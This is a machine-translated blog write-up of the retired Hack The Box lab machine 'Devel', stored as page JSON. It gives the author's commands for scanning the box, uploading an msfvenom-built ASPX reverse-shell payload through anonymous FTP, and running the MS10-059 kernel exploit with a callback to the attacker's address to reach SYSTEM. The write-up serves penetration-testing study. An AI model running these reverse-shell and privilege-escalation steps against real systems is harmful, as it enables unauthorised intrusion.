{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-devel-en","result":{"data":{"markdownRemark":{"id":"51d880cb-6c3f-5de2-b518-1c7f10883f4e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-devel\">original page</a>.</p>\n</blockquote>\n<p>I learn about security through the penetration-testing learning platform called “Hack The Box.”\nAt the time of writing, my rank on “Hack The Box” is Pro Hacker.</p>\n<p><img src=\"/static/c65a90f896171af0c6b6f7c98c6e4ed0/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\"></p>\n<p>This time, this is a writeup for HackTheBox’s retired machine “Devel.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" 
class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About this article</h2>\n<p><strong>The content of this article is not intended to recommend acts that are contrary to public order.</strong></p>\n<p>Please note in advance that attempting attacks against environments other than ones you own or are explicitly authorized to test may violate laws such as the Unauthorized Access Prohibition Act.</p>\n<p>Also, all statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#local-enumeration\">Local enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege escalation</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" 
aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<p>It turned out that anonymous FTP login was possible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">\"s/^[0-9].*$RHOST/10.10.10.5  $RHOST/g\"</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token number\">21</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ftp</span>     Microsoft ftpd\n<span class=\"token operator\">|</span> ftp-syst: \n<span class=\"token operator\">|</span>_  SYST: Windows_NT\n<span class=\"token operator\">|</span> ftp-anon: Anonymous FTP login allowed <span class=\"token punctuation\">(</span>FTP code <span class=\"token number\">230</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> 03-18-17  02:06AM       <span class=\"token operator\">&lt;</span>DIR<span class=\"token operator\">></span>          aspnet_client\n<span class=\"token operator\">|</span> 03-17-17  05:37PM                  <span class=\"token number\">689</span> iisstart.htm\n<span class=\"token operator\">|</span>_03-17-17  05:37PM               <span class=\"token 
number\">184946</span> welcome.png\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Microsoft IIS httpd <span class=\"token number\">7.5</span>\n<span class=\"token operator\">|</span>_http-title: IIS7\n<span class=\"token operator\">|</span> http-methods: \n<span class=\"token operator\">|</span>_  Potentially risky methods: TRACE\n<span class=\"token operator\">|</span>_http-server-header: Microsoft-IIS/7.5\nService Info: OS: Windows<span class=\"token punctuation\">;</span> CPE: cpe:/o:microsoft:windows</code></pre></div>\n<p>Also, IIS was running on port 80.</p>\n<p><img src=\"/static/5b703a27eff891e603d40f4a628f7ad5/d9199/image-20220723114718813.png\" alt=\"image-20220723114718813\" title=\"image-20220723114718813\"></p>\n<p>Since anonymous FTP login was available, I embedded an ASP payload created with msfvenom into the web server and obtained a reverse shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\"><span class=\"token variable\">`</span><span class=\"token function\">ip</span> addr <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> -E -o <span class=\"token string\">\"10.10.([0-9]{1,3}[\\.]){1}[0-9]{1,3}\"</span><span class=\"token variable\">`</span></span>\n$ msfvenom -f aspx -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\">$LHOST</span> <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> -o rev.aspx\n\n$ <span class=\"token builtin class-name\">echo</span> <span class=\"token function\">open</span> <span class=\"token number\">10.10</span>.10.5 <span class=\"token operator\">></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span 
class=\"token builtin class-name\">echo</span> user anonymous <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> binary <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> put rev.aspx <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> quit <span class=\"token operator\">>></span> ftp.txt\n$ <span class=\"token function\">ftp</span> -n <span class=\"token operator\">&lt;</span> ftp.txt</code></pre></div>\n<p>That gave me a shell.</p>\n<h2 id=\"local-enumeration\" style=\"position:relative;\"><a href=\"#local-enumeration\" aria-label=\"local enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Local enumeration</h2>\n<p>I got a shell, but unfortunately the privileges were the weak <code class=\"language-text\">iis apppool\\web</code>.</p>\n<p>So I started looking for a path to privilege escalation.</p>\n<p>Checking the system information first, I confirmed that it was a Windows 7 machine.</p>\n<p><img src=\"/static/9c77f2117d6826de4bb3f6f07ab87036/c4b7c/image-20220723203944396.png\" alt=\"image-20220723203944396\" title=\"image-20220723203944396\"></p>\n<p>I explored scheduled tasks and files on the host, but I did not find anything useful, so I decided to look for local vulnerabilities.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ python 
windows-exploit-suggester.py --database <span class=\"token number\">2022</span>-07-23-mssb.xls --systeminfo systeminfo.txt\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> initiating winsploit version <span class=\"token number\">3.3</span><span class=\"token punctuation\">..</span>.\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> database <span class=\"token function\">file</span> detected as xls or xlsx based on extension\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> attempting to <span class=\"token builtin class-name\">read</span> from the systeminfo input <span class=\"token function\">file</span>\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> systeminfo input <span class=\"token function\">file</span> <span class=\"token builtin class-name\">read</span> successfully <span class=\"token punctuation\">(</span>utf-8<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> querying database <span class=\"token function\">file</span> <span class=\"token keyword\">for</span> potential vulnerabilities\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> comparing the <span class=\"token number\">0</span> hotfix<span class=\"token punctuation\">(</span>es<span class=\"token punctuation\">)</span> against the <span class=\"token number\">179</span> potential bulletins<span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span> with a database of <span class=\"token number\">137</span> known exploits\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> there are now <span class=\"token number\">179</span> remaining vulns\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token 
punctuation\">[</span>E<span class=\"token punctuation\">]</span> exploitdb PoC, <span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> Metasploit module, <span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> missing bulletin\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> windows version identified as <span class=\"token string\">'Windows 7 32-bit'</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> \n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS13-009: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">2792100</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS13-005: Vulnerability <span class=\"token keyword\">in</span> Windows Kernel-Mode Driver Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">2778930</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS12-037: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">2699988</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span>   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer <span class=\"token number\">8</span> - Fixed Col Span ID Full ASLR, DEP <span class=\"token operator\">&amp;</span> EMET <span class=\"token number\">5</span>., PoC\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span>   http://www.exploit-db.com/exploits/34815/ -- 
Internet Explorer <span class=\"token number\">8</span> - Fixed Col Span ID Full ASLR, DEP <span class=\"token operator\">&amp;</span> EMET <span class=\"token number\">5.0</span> Bypass <span class=\"token punctuation\">(</span>MS12-037<span class=\"token punctuation\">)</span>, PoC\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> \n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS11-011: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">2393802</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-073: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel-Mode Drivers Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">981957</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-061: Vulnerability <span class=\"token keyword\">in</span> Print Spooler Service Could Allow Remote Code Execution <span class=\"token punctuation\">(</span><span class=\"token number\">2347290</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS10-059: Vulnerabilities <span class=\"token keyword\">in</span> the Tracing Feature <span class=\"token keyword\">for</span> Services Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">982799</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS10-047: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow 
Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">981852</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-015: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">977165</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-002: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">978207</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS09-072: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">976325</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> <span class=\"token keyword\">done</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege escalation</h2>\n<p>In the 
previous section, I was able to identify candidate vulnerabilities.</p>\n<p>Since I could write files via FTP under <code class=\"language-text\">wwwroot</code>, I tried a few exploits that looked promising.</p>\n<p>In the end, the PoC for <a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS10-059</a> worked.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># File transfer</span>\n<span class=\"token builtin class-name\">echo</span> <span class=\"token function\">open</span> <span class=\"token number\">10.10</span>.10.5 <span class=\"token operator\">></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> user anonymous <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> binary <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> put MS10-059.exe <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> quit <span class=\"token operator\">>></span> ftp.txt\n<span class=\"token function\">ftp</span> -n <span class=\"token operator\">&lt;</span> ftp.txt\n\n<span class=\"token comment\"># Exploit</span>\nMS10-059.exe <span class=\"token number\">10.10</span>.14.2 <span class=\"token number\">9999</span></code></pre></div>\n<p>This gave me SYSTEM privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">c:<span class=\"token punctuation\">\\</span>inetpub<span class=\"token punctuation\">\\</span>wwwroot<span class=\"token operator\">></span>whoami\n<span 
class=\"token function\">whoami</span>\nnt authority<span class=\"token punctuation\">\\</span>system</code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>It feels good when an easy box falls quickly like this.</p>","fields":{"slug":"/hackthebox-windows-devel-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-23","description":"This is a writeup for HackTheBox’s retired machine “Devel.”","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"【Easy/Windows】Devel Writeup (HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-devel-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}